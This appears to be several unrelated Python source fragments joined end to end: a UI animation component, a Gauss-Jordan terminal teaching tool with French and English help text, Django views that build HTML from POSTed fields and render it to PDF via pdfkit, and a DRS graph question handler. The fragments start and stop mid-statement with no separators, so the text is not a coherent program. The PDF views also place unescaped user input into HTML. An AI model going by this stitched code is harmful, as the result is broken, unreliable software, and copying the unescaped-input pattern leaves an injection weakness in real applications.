animation (UIAnimation): the animation to save
name (str): the name under which to retrieve it later
"""
if name in self.saved_animations:
self.saved_animations[name].append(animation)
else:
self.saved_animations[name] = [animation]
def skip_next_animation(self):
"""Finishes the next animation immediately
"""
current_num_animations = len(self.queued_animations)
while len(self.queued_animations) >= current_num_animations and len(self.queued_animations) > 0:
self.update(100)
def skip_all_animations(self):
"""clears the animation queue by finishing all of them instantly, except for unskippable animations
Useful for skip button implementation.
"""
for child in self.children:
child.skip_all_animations()
# remove unskippable animations from queue
unskippables = [anim for anim in self.queued_animations if not anim.skippable]
self.queued_animations = list(filter(lambda anim: anim.skippable, self.queued_animations))
while len(self.queued_animations) > 0:
self.update(100)
self.queued_animations = unskippables
def update(self, manual_delta_time=0):
"""update. used at the moment to advance animations.
"""
if manual_delta_time > 0:
delta_time = manual_delta_time
else:
delta_time = (self._chronometer() - self._last_update) * self.animation_speed
self._last_update = self._chronometer()
if len(self.queued_animations) > 0:
try:
if self.queued_animations[0].update(delta_time):
# the above function call returns True if the animation is finished
self.queued_animations.pop(0)
except Exception as e:
logging.exception('%s: Animation exception! Aborting animation for component %s. Error message: %s',
'ui_framework.py:update()',
self.name,
repr(e))
self.queued_animations.pop(0)
def _reset(self, reason: str=None):
"""Resets internal state. Triggers on dimension change, so as to allow
dynamically resized subclasses to resize on prop change.
Args:
reason (str): the source of the reset call; usually the name of the function or property
(e.g. 'size')
"""
pass
def _create_bg_surf(self) -> Surface:
"""Generates the background surf for this component of identical dimension
as the component itself. If the background image isn't the same size as the component,
and we want to rescale, then we will use PIL to rescale. Because rescaling is expensive,
we'll be making use of limited caching here.
Returns:
Surface: A surface of size self.width x self.height, containing a scaled background image.
"""
if self.props.bg is None:
surf = engine.create_surface(self.tsize, True)
surf.fill(self.props.bg_color)
return surf
else:
if not self.cached_background or not self.cached_background.get_size() == self.tsize:
if self.props.bg_resize_mode == ResizeMode.AUTO:
bg_raw = engine.surf_to_raw(self.props.bg, 'RGBA')
pil_bg = Image.frombytes('RGBA', self.props.bg.get_size(), bg_raw, 'raw')
pil_bg = pil_bg.resize(self.tsize, resample=LANCZOS)
bg_scaled = engine.raw_to_surf(pil_bg.tobytes('raw', 'RGBA'), self.tsize, 'RGBA')
self.cached_background = bg_scaled
else:
base = engine.create_surface(self.tsize, True)
base.blit(self.props.bg, (0, 0))
self.cached_background = base
return self.cached_background
def to_surf(self) -> Surface:
if not self.enabled:
return engine.create_surface(self.size, True)
# draw the background.
base_surf = self._create_bg_surf().copy()
# position and then draw all children recursively according to our layout
for child in self.children:
child.update()
for idx, child_pos in enumerate(self.layout_handler.generate_child_positions()):
child = self.children[idx]
base_surf.blit(child.to_surf(), child_pos)
# draw the hard coded surfaces
"""Gauss-Jordan assistant
Enabling user-driven live demonstration of the Gauss-Jordan algorithm
in a terminal/console.
Source: https://github.com/aroberge/gauss-jordan-assistant
Requires Python 3.8+ and Rich (https://github.com/willmcgugan/rich)
All the content is in this single file, for those that do not want
to install from Pypi and simply copy and possibly modify to suit
their individual needs.
The organisation is as follows:
1. Rich specific definitions
2. Translations (French and English)
3. String parsing using regular expressions
4. Various LaTeX templates
5. The main code
"""
__version__ = "0.3"
import re
import tkinter
from tkinter import filedialog
from fractions import Fraction
from rich.box import Box
from rich.console import Console
from rich.markdown import Markdown
from rich.table import Table
from rich.theme import Theme
# Since we already use Rich, we might as well get pretty tracebacks. :-)
from rich.traceback import install
install(extra_lines=1)
# ===============================================
# Rich specific definitions
# ===============================================
dark_background_theme = Theme(
{
"markdown.h1.border": "deep_sky_blue1",
"markdown.h1": "bold yellow",
"markdown.h2": "bold yellow underline",
"markdown.item.bullet": "spring_green4",
"markdown.code": "bold yellow",
"matrix": "deep_sky_blue1",
"matrix_element": "white",
"error": "bold red",
"prompt": "spring_green4",
"row_operation": "bold yellow",
"same_row": "bold white underline",
"echelon": "white on dark_red",
}
)
light_background_theme = Theme(
{
"markdown.h1.border": "deep_sky_blue1",
"markdown.h1": "blue",
"markdown.h2": "blue underline",
"markdown.item.bullet": "spring_green4",
"markdown.code": "purple",
"matrix": "deep_sky_blue1",
"matrix_element": "black",
"error": "red",
"prompt": "spring_green4",
"row_operation": "spring_green4",
"same_row": "blue underline",
"echelon": "black on grey85",
}
)
THEME = dark_background_theme
console = Console(theme=THEME)
theme_demo_en = """
Colours are now as follows:
"input >" [prompt]input >[/prompt]
"error" [error]error[/error]
"| 0 1 |" [matrix]| [echelon] 0 [/echelon] [matrix_element] 1 [/matrix_element] |[/matrix]
"R_1 + 2 R_2 --> R_1" [same_row]R_1[/same_row][row_operation] + 2 R_2 --> [/row_operation][same_row]R_1[/same_row]
"""
theme_demo_fr = """
Les couleurs ont été changées comme suit :
"entrée >" [prompt]entrée >[/prompt]
"erreur" [error]erreur[/error]
"| 0 1 |" [matrix]| [echelon] 0 [/echelon] [matrix_element] 1 [/matrix_element] |[/matrix]
"L_1 + 2 L_2 --> L_1" [same_row]L_1[/same_row][row_operation] + 2 L_2 --> [/row_operation][same_row]L_1[/same_row]
"""
# Design our style of "box" to be used by rich
MATRIX = Box(
"""\
╭ ╮
│ ││
│ ││
│ ││
│ ││
│ ││
│ ││
╰ ╯
"""
)
# ===============================================
# String translations
# ===============================================
LANG = "en"
translations = {"en": {}, "fr": {}}
def _(text):
"""Mimicking gettext translations with simple dict"""
if LANG in translations:
return translations[LANG][text]
else:
return translations["en"][text]
help_en = """# Available commands
- `fr` : change la langue au français
- colours/colors : toggle colours between themes designed for dark or light backgrounds.
## Matrix operations
Below, `i, j, m, n, p` are integers and `f` is either
an integer or a fraction (`m/n`).
First, define a matrix:
- `mat m x n` : Coefficient matrix
- `mat m x n | p` : Augmented matrix with `p` extra columns.
Then, perform some elementary row operations:
- `R_i <--> R_j` : row exchange
- `R_i +/- [f] R_j --> R_i` : linear combination (do not write `f` if `f=1`)
- `f R_i --> R_i` : multiplication by a scalar
## Other commands
- `latex` : saves as a LaTeX file.
- `help` / `aide`
- `quit` / `exit`
"""
help_fr = """# Liste des commandes
- `en` : changes language to English
- couleurs : change les couleurs entre deux choix selon que l' arrière-plan est pâle ou foncé
## Opérations sur les matrices
Ci-dessous, `i, j, m, n, p` sont des entiers et `f` est soit
un entier ou soit un nombre rationnel (`m/n`).
En premier, définir votre matrice
- `mat m x n` : matrice des coefficients
- `mat m x n | p` : matrice augmentée avec `p` colonnes supplémentaires
Ensuite, faites des opérations élémentaires sur les lignes:
- `L_i <--> L_j` : échange de lignes
- `L_i +/- [f] L_j --> L_i` : combinaison linéaire (omettre `f` si `f=1`)
- `f L_i --> L_i` : multiplication par un scalaire
## Autres commandes
- `latex` : sauvegarde dans un fichier LaTeX.
- `aide` / `help`
- `quit`[ter] / `exit`
"""
translations["en"]["help"] = Markdown(help_en)
translations["fr"]["help"] = Markdown(help_fr)
translations["en"]["R_or_L"] = "R"
translations["fr"]["R_or_L"] = "L"
translations["en"]["Unknown operation"] = "Unknown operation"
translations["fr"]["Unknown operation"] = "Opération non reconnue."
translations["en"]["Add matrix line"] = "Enter a line with %d matrix elements: "
translations["fr"]["Add matrix line"] = "Entrez une ligne avec %d coefficients : "
translations["en"]["Data entry stopped."] = "Data entry stopped."
translations["fr"]["Data entry stopped."] = "Entrée des données interrompue."
translations["en"]["Wrong format"] = "The matrix element format is incorrect."
translations["fr"]["Wrong format"] = "Le format des coefficients soumis est incorrect."
translations["en"]["Wrong number"] = "Wrong number of matrix elements."
translations["fr"]["Wrong number"] = "Le nombre de coefficients soumis est incorrect."
translations["en"][
"Scalar multiplication on same line"
] = "Scalar multiplication must operate on a single line."
translations["fr"][
"Scalar multiplication on same line"
] = "La multiplication par un scalaire doit transformer la même ligne."
translations["en"]["Row does not exist"] = "Row %d does not exist."
translations["fr"]["Row does not exist"] = "La ligne %s n'existe pas."
translations["en"]["Cannot multiply by zero"] = "A row cannot be multiplied by zero."
translations["fr"][
"Cannot multiply by zero"
] = "On ne peut pas multiplier une ligne par zéro."
translations["en"]["No effect"] = "This operation causes no change."
translations["fr"]["No effect"] = "Cette opération ne change rien."
translations["en"]["Must be the same line"] = "Start and end row must be the same."
translations["fr"][
"Must be the same line"
] = "Les lignes de départ et d'arrivée doivent être identiques."
translations["en"][
"Cannot use a single line"
] = "A linear combination requires two different rows."
translations["fr"][
"Cannot use a single line"
] = "Une combinaison linéaire requiert deux lignes différentes."
translations["en"]["Nothing to save"] = "Nothing to save: no matrix defined."
translations["fr"]["Nothing to save"] = "Il n'y a aucune matrice de définie."
translations["en"]["saved file"] = "Content saved in file %s"
translations["fr"]["saved file"] = "Sauvegarde dans le fichier %s"
# ===============================================
# String parsing using regular expressions
# ===============================================
re_quit = re.compile(r"(quit|exit).*", re.IGNORECASE)
re_help = re.compile(r"(help|aide).*", re.IGNORECASE)
# matches integers or fractions as in 1 22 2/33 , etc.
re_fract = re.compile(r"(-?\d+/?\d*)") # /? means zero or 1 /
# This is the most complicated regex used;
# for this reason, I have shown the main steps.
# This matches something like R_2 + 1/2 R_3 --> R_2
# For simplicity, instead of R for row, we can use L (ligne, en français):
# either L or R will work in any context.
# Also for simplicity, R_2 is identical to R2
# Finally, we limit the row number to be a single digit.
re_row_lin_combo_2 = re.compile(
r"""^ # line begins
\s*
[LR]_?(\d) # original row; can use either L or R to denote a row
\s*
(\+|-) # plus or minus
\s*
(\d+/?\d*) # integer or fraction
\s*
[LR]_?(\d) # other row
\s*
-+> # arrow -->
\s*
[LR]_?(\d) # target line
\s*
$ # end of line
""",
re.VERBOSE,
)
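# Worked example (verifiable in a REPL):
#   re_row_lin_combo_2.match("R_2 + 1/2 R_3 --> R_2").groups()
#   # -> ('2', '+', '1/2', '3', '2')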
# mat 3 x 4
re_mat = re.compile(r"^\s*mat\s*(\d+)\s*x\s*(\d+)\s*$", re.IGNORECASE)
# mat 3 x 4 | 1
re_aug_mat = re.compile(r"^\s*mat\s*(\d+)\s*x\s*(\d+)\s*\|\s*(\d+)\s*$", re.IGNORECASE,)
# The following matches R_2 <--> R_3 and similar operations
re_row_interchange = re.compile(r"""^\s*[LR]_?(\d)\s*<-+>\s*[LR]_?(\d)\s*$""")
# This matches something like 1/2 R_3 --> R_3
re_row_scaling = re.compile(r"^\s*(-?\d+/?\d*)\s*[LR]_?(\d)\s*-+>\s*[LR]_?(\d)\s*$")
# This matches something like R_2 - R_3 --> R_2
re_row_lin_combo_1 = re.compile(
r"^\s*[LR]_?(\d)\s*(\+|-)\s*[LR]_?(\d)\s*-+>\s*[LR]_?(\d)\s*$"
)
# ===============================================
# LaTeX templates
#
# For LaTeX output, we use the beamer document class,
# with each individual transformation intended to be shown
# on a separate frame (aka slide).
#
# We also include a LaTeX command, \GJAfrac, with
# two possible definitions, giving the possibility to
# easily change how fractions are represented.
#
# Coefficient and augmented matrices are shown with
# square brackets using the "bmatrix" environment.
# Round brackets can be used instead if one replaces
# "bmatrix" by "pmatrix".
# ===============================================
LaTeX_begin_document = """
\\documentclass{beamer}
%
% augmented matrix from http://tex.stackexchange.com/questions/2233
\\makeatletter
\\renewcommand*\\env@matrix[1][*\\c@MaxMatrixCols r]{%
\\hskip -\\arraycolsep
\\let\\@ifnextchar\\new@ifnextchar
\\array{#1}}
\\makeatother
%\\newcommand{\\GJAfrac}[2]{#1/#2}
\\newcommand{\\GJAfrac}[2]{\\frac{#1}{#2}}
\\begin{document}
"""
LaTeX_end_document = "\\end{document}"
LaTeX_begin_frame = """
\\begin{frame}{Frame %d}
\\[
\\begin{matrix}[ccc]
"""
LaTeX_end_frame = """\\end{matrix}
\\]
\\end{frame}
%===========================================
"""
LaTeX_begin_bmatrix = "\\begin{bmatrix}[%s%s]"
LaTeX_end_bmatrix = "\\end{bmatrix}\n"
LaTeX_begin_row_op_matrix = "\\begin{matrix}[r]"
LaTeX_end_row_op_matrix = "\\end{matrix}\n"
# ===============================================
RIGHT_ARROW = "-->" # used in printing row operations
class Assistant:
"""Enables user-driven live demonstration of Gauss-Jordan algorithm."""
def __init__(self):
self.prompt = self.default_prompt = "> "
self.matrix = None
print("lang =", LANG)
self.interact()
def interact(self):
"""Command interpreter"""
while True:
command = self.user_input()
if re.search(re_quit, command):
break
result = self.parse(command)
if result and self.matrix is not None:
self.console_print()
self.update_latex_content()
self.current_row_operations.clear()
self.latex_current_row_operations.clear()
def parse(self, command):
"""Parses command controlling the information displayed.
To show the latest matrix update, an operation must return True.
"""
global console, LANG, THEME
lowercase = command.lower()
if lowercase in ["colors", "colours", "couleurs"]:
if THEME == dark_background_theme:
THEME = light_background_theme
else:
THEME = dark_background_theme
console = Console(theme=THEME)
if LANG == "en":
console.print(theme_demo_en)
else:
console.print(theme_demo_fr)
elif lowercase in ["en", "fr"]:
if lowercase == LANG:
console.print(_("No effect"))
else:
LANG = lowercase
print("lang =", LANG)
elif command.lower() == "latex":
self.save_latex()
elif re.search(re_help, command):
console.print(_("help"), "\n")
elif op := re.search(re_mat, command):
return self.new_matrix(int(op.group(1)), int(op.group(2)))
elif op := re.search(re_aug_mat, command):
return self.new_matrix(int(op.group(1)), int(op.group(2)), int(op.group(3)))
elif op := re.search(re_row_interchange, command):
return self.interchange_rows(int(op.group(1)), int(op.group(2)))
elif op := re.search(re_row_scaling, command):
return self.scale_row(
Fraction(op.group(1)), int(op.group(2)),
\
'<td>' + r5c2 + '</td>' + \
'<td>' + r5c3 + '</td>' + \
'<td>' + r5c4 + '</td>' + \
'<td>' + r5c5 + '</td>' + \
'<td>' + r5c6 + '</td>' + \
'<td>' + r5c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>6</td>' + \
'<td>' + r6c1 + '</td>' + \
'<td>' + r6c2 + '</td>' + \
'<td>' + r6c3 + '</td>' + \
'<td>' + r6c4 + '</td>' + \
'<td>' + r6c5 + '</td>' + \
'<td>' + r6c6 + '</td>' + \
'<td>' + r6c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>7</td>' + \
'<td>' + r7c1 + '</td>' + \
'<td>' + r7c2 + '</td>' + \
'<td>' + r7c3 + '</td>' + \
'<td>' + r7c4 + '</td>' + \
'<td>' + r7c5 + '</td>' + \
'<td>' + r7c6 + '</td>' + \
'<td>' + r7c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>8</td>' + \
'<td>' + r8c1 + '</td>' + \
'<td>' + r8c2 + '</td>' + \
'<td>' + r8c3 + '</td>' + \
'<td>' + r8c4 + '</td>' + \
'<td>' + r8c5 + '</td>' + \
'<td>' + r8c6 + '</td>' + \
'<td>' + r8c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>9</td>' + \
'<td>' + r9c1 + '</td>' + \
'<td>' + r9c2 + '</td>' + \
'<td>' + r9c3 + '</td>' + \
'<td>' + r9c4 + '</td>' + \
'<td>' + r9c5 + '</td>' + \
'<td>' + r9c6 + '</td>' + \
'<td>' + r9c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>10</td>' + \
'<td>' + r10c1 + '</td>' + \
'<td>' + r10c2 + '</td>' + \
'<td>' + r10c3 + '</td>' + \
'<td>' + r10c4 + '</td>' + \
'<td>' + r10c5 + '</td>' + \
'<td>' + r10c6 + '</td>' + \
'<td>' + r10c7 + '</td>' + \
'</tr>' + \
'</tbody>' + \
'</table>'
body += '<br>' + \
'</div>' + \
'</div>' + \
'</div>' + \
'<br>' + \
'<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"' + \
'integrity="<KEY>"' + \
'crossorigin="anonymous"></script>' + \
'<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"' + \
'integrity="<KEY>"' + \
'crossorigin="anonymous"></script>' + \
'</body>' + \
'</html>'
options = {
'page-size': 'A4',
'header-center': 'Petty cash journal',
'footer-left': 'Company : ' + company_name + ' [' + establishment_number + ']',
'footer-right': '[page] of [topage]',
'encoding': 'UTF-8',
'no-outline': None,
'custom-header': [
('Accept-Encoding', 'pdf')
]
}
# path_wkthmltopdf = 'static/reporting/static/wkhtmltopdf.exe'
# config = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf)
# output = pdfkit.from_string(body, output_path=False, configuration=config, options=options)
output = pdfkit.from_string(body, output_path=False, options=options)
response = HttpResponse(output, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="petty_cash_journal.pdf"'
return response
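# The repeated .replace chains in the views below could be collapsed with a
# small helper like this (a sketch; `sanitize` is not a name this module uses):
def sanitize(value):
    """Collapse tabs, newlines and carriage returns in a POSTed field to spaces."""
    return value.replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
# e.g. company_name = sanitize(request.POST.get('company_name'))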
def vendor_product_pricing_sheet(request):
return render(request, 'reporting/vendor_product_pricing_sheet.html')
def generate_html_to_pdf_vendor_product_pricing_sheet(request):
company_name = request.POST.get('company_name').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
share_capital = request.POST.get('share_capital').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
head_office_address = request.POST.get('head_office_address').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
establishment_number = request.POST.get('establishment_number').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
register_of_trade_and_companies = request.POST.get('register_of_trade_and_companies').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
main_activities = request.POST.get('main_activities').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
activity_number = request.POST.get('activity_number').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
intra_community_vat_number = request.POST.get('intra_community_vat_number').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
president = request.POST.get('president').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
registration_date = request.POST.get('registration_date').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c1 = request.POST.get('r1c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c2 = request.POST.get('r1c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c3 = request.POST.get('r1c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c4 = request.POST.get('r1c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c1 = request.POST.get('r2c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c2 = request.POST.get('r2c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c3 = request.POST.get('r2c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c4 = request.POST.get('r2c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c1 = request.POST.get('r3c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c2 = request.POST.get('r3c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c3 = request.POST.get('r3c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c4 = request.POST.get('r3c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c1 = request.POST.get('r4c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c2 = request.POST.get('r4c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c3 = request.POST.get('r4c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c4 = request.POST.get('r4c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c1 = request.POST.get('r5c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c2 = request.POST.get('r5c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c3 = request.POST.get('r5c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c4 = request.POST.get('r5c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c1 = request.POST.get('r6c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c2 = request.POST.get('r6c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c3 = request.POST.get('r6c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c4 = request.POST.get('r6c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c1 = request.POST.get('r7c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c2 = request.POST.get('r7c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c3 = request.POST.get('r7c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c4 = request.POST.get('r7c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c1 = request.POST.get('r8c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c2 = request.POST.get('r8c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c3 = request.POST.get('r8c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c4 = request.POST.get('r8c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c1 = request.POST.get('r9c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c2 = request.POST.get('r9c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c3 = request.POST.get('r9c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c4 = request.POST.get('r9c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c1 = request.POST.get('r10c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c2 = request.POST.get('r10c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c3 = request.POST.get('r10c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c4 = request.POST.get('r10c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
body = '<!doctype html>' + \
'<html lang="en">' + \
'<head>' + \
'<meta charset="utf-8">' + \
'<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">' + \
'<link rel="stylesheet"' + \
'href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css"' + \
'integrity="<KEY>"' + \
'crossorigin="anonymous">' + \
'<title>Vendor product pricing sheet</title>' + \
'</head>' + \
'<body>' + \
'<div class="container">' + \
'<div class="card text-center">' + \
'<div class="card-header text-center">Vendor product pricing sheet</div>' + \
'<div class="card-body">'
body += '<h6>Company name : ' + company_name + '</h6>' + \
'<h6>Share capital : ' + share_capital + '</h6>' + \
'<h6>Head office address : ' + head_office_address + '</h6>' + \
'<h6>Establishment number : ' + establishment_number + '</h6>' + \
'<h6>Register of Trade and Companies : ' + register_of_trade_and_companies + '</h6>' + \
'<h6>Main activities : ' + main_activities + '</h6>' + \
'<h6>Activity number : ' + activity_number + '</h6>' + \
'<h6>Intra-community VAT number : ' + intra_community_vat_number + '</h6>' + \
'<h6>President : ' + president + '</h6>' + \
'<h6>Registration date : ' + registration_date + '</h6>' + \
'<br>'
body += '<br>'
body += '<table class="table table-striped table-bordered">' + \
'<thead>' + \
'<tr>' + \
'<th scope="col">Details</th>' + \
'<th scope="col">Product</th>' + \
'<th scope="col">Quantity</th>' + \
'<th scope="col">Price per unit</th>' + \
'<th scope="col">Total</th>' + \
'</tr>' + \
'</thead>' + \
'<tbody>' + \
'<tr>' + \
'<td>1</td>' + \
'<td>' + r1c1 + '</td>' + \
'<td>' + r1c2 + '</td>' + \
'<td>' + r1c3 + '</td>' + \
'<td>' + r1c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>2</td>' + \
'<td>' + r2c1 + '</td>' + \
'<td>' + r2c2 + '</td>' + \
'<td>' + r2c3 + '</td>' + \
'<td>' + r2c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>3</td>' + \
'<td>' + r3c1 + '</td>' + \
'<td>' + r3c2 + '</td>' + \
'<td>' + r3c3 + '</td>' + \
'<td>' + r3c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>4</td>' + \
'<td>' + r4c1 + '</td>' + \
'<td>' + r4c2 + '</td>' + \
'<td>' + r4c3 + '</td>' + \
'<td>' + r4c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>5</td>' + \
'<td>' | |
number in the name is irrelevant)
propGraph = PropertyGraph(self.graphNumber)
propGraph.appendPropValue(propRefId)
propGraph.appendPropAdj(propAdjective)
propGraph.appendPropDegree(propDegree)
# Increase the graph number for auto-generation of names
self.graphNumber = self.graphNumber + 1
# If a main graph already exists, then add the new graph in to it
if self.DRSGraph.graph is not None:
self.DRSGraph.graph = networkx.algorithms.operators.binary.compose(self.DRSGraph.graph, propGraph.graph)
# if no main graph exists, this is the main graph
else:
self.DRSGraph.graph = propGraph.graph
return True
else:
outEdgesFromNode = self.DRSGraph.graph.out_edges(existingNodeWithRefId, data=True)
adjectiveNode = None
for startNode, endNode, edgeValues in outEdgesFromNode:
# If an edge has the value ItemHasName, then we want to modify the end node
if edgeValues[CONST_NODE_VALUE_KEY] == CONST_PROP_HAS_ADJECTIVE_EDGE:
# Update graph with name
adjectiveNode = endNode
if adjectiveNode is not None:
# TODO: SEE IF I CAN UPDATE THIS TO NOT USE THIS FUNCTION
self.DRSGraph.AppendValueAtSpecificNode(adjectiveNode, propAdjective)
else:
print("Error - Encountered duplicate reference for property but did not find adjective "
"node to append to")
return True
# Method used to get the name out of a "named" predicate and associate said name with the appropriate object.
def nameItem(self, predSubjRef, predDirObjRef, DRSGraph):
# Get item name out of "named(XYZ)"
itemName = predSubjRef[predSubjRef.find("(") + 1:predSubjRef.find(")")]
# Replace the name
DRSGraph.ReplaceItemNameAtSpecificNode(predDirObjRef, "\"" + itemName + "\"")
# Return graph
return DRSGraph
# CURRENTLY OPERATING UNDER ASSUMPTION THAT questions ALWAYS end with the predicate as the final piece.
# This will definitely need to be revised (probably just check whether
# the current line is the final question line and then process the complete question at that point).
class questionSwitcher(object):
def __init__(self):
self.graphNumber = 0
self.DRSGraph = None
self.nodesWithGivenProperty = []
self.nodesWithGivenPropertyAntonym = []
self.subjectNode = None
self.objectNode = None
self.itemCount = 0
self.propertyCount = 0
self.newToOldRefIDMapping = {}
self.predicateTrue = None
self.negationActive = None
self.verbTargetGap = False
# Method to call the appropriate function based on the argument passed in
def callFunction(self, predicateType, predicateContents, DRSGraph):
# Get the name of the method
methodName = 'question_' + str(predicateType)
# Get the method itself
method = getattr(self, methodName, lambda: "Unknown predicate")
# Call the method and return its output
self.DRSGraph = DRSGraph
method(predicateContents)
def returnDRSGraph(self):
return self.DRSGraph
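# Dispatch sketch: callFunction builds 'question_' + predicateType and resolves
# it with getattr, so a call like the following (arguments illustrative,
# mirroring APE's DRS object predicate object(A,box,countable,na,eq,1)):
#   qs = questionSwitcher()
#   qs.callFunction('object', 'A,box,countable,na,eq,1)', graph)  # -> question_object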
def question_object(self, predicateContents):
# Get object information
predicateComponents = predicateContents.split(',')
objRefId = predicateComponents[0]
objRole = predicateComponents[1]
# objClass = predicateComponents[2]
# objUnit = predicateComponents[3]
objOperator = predicateComponents[4]
objCount = predicateComponents[5].split(')')[0]
# Get item node in original instruction which this SHOULD correspond to (ignoring name for now)
DRSEquivalentNode = self.findMatchingItemNode(objRole, objOperator, objCount)
# If we don't find a node for this item, then we have encountered a lexical gap.
newNymCount = 0
if CONTROL_IDENTIFY_LEXICAL is True:
if DRSEquivalentNode is None:
print("Lexical gap encountered - a role (" + objRole + ") was introduced which is not currently in the"
" system's vocabulary.")
if CONTROL_RESOLVE_LEXICAL is True:
# TODO: Allow user to manually choose yes/no to resolve?
while DRSEquivalentNode is None and newNymCount < 3:
# No nodes "active"
newRole = requestNewTermToNymCheck(objRole)
newNymCount = newNymCount + 1
DRSEquivalentNode = self.findMatchingItemNode(newRole, objOperator, objCount)
if DRSEquivalentNode is not None:
print("Lexical gap resolved - a role given (" + newRole + ") was found associated with an"
" item in the knowledge base")
DRSEquivalentNameNode = self.findRoleNodeConnectedToItemNode(DRSEquivalentNode)
self.DRSGraph.AppendValueAtSpecificNode(DRSEquivalentNameNode, objRole)
# Replace the reference ID (from APE Webclient) to the equivalent node's reference ID (from the graph)
if self.DRSGraph.graph.has_node(DRSEquivalentNode):
DRSNodeRefID = self.DRSGraph.graph.node[DRSEquivalentNode][CONST_NODE_VALUE_KEY]
self.newToOldRefIDMapping.update({objRefId: DRSNodeRefID})
self.itemCount = self.itemCount + 1
else:
self.newToOldRefIDMapping.update({objRefId: None})
# WILL NEED TO FIND A WAY TO HANDLE NAME AND ROLE TO GET MORE ACCURATE PICTURE?
# HANDLE PROPERTIES
# TODO: Handle 4/6 component properties
# TODO: Handle degrees besides "pos"
def question_property(self, predicateContents):
# Declare lists used later
adjectiveNodes = []
antonymNodes = []
openGap = False
# Break up the predicate
predicateComponents = predicateContents.split(',')
numberOfComponents = len(predicateComponents)
# Always have first two components, others distributed based on number of components
propRefId = predicateComponents[0]
propAdjective = predicateComponents[1]
# Different cases (differing number of components) - completely unused right now, but leaving commented out
# in case of implementation
if numberOfComponents == 3:
# Only a primary object
# propDegree = predicateComponents[2].split(')')[0]
pass
elif numberOfComponents == 4:
# Primary and secondary object
# propDegree = predicateComponents[2]
# propSecObj = predicateComponents[3].split(')')[0]
pass
elif numberOfComponents == 6:
# Primary, secondary, and tertiary objects
# propSecObj = predicateComponents[2]
# propDegree = predicateComponents[3]
# propCompTarget = predicateComponents[4]
# propTertObj = predicateComponents[5].split(')')[0]
pass
else:
# invalid
raise ValueError('Unexpected number of predicate components: %d' % numberOfComponents)
# INITIAL NYM TESTING - will need to extend to other predicates as well of course
# TODO: Resolve occurs before identify here - that shouldn't be the case probably
adjectiveNymList, antonymList = getNyms(propAdjective)
if CONTROL_RESOLVE_LEXICAL is True:
adjectiveNodes = self.ListOfNodesWithValueFromList(adjectiveNymList)
else:
adjectiveNodes = self.ListOfNodesWithValue(propAdjective)
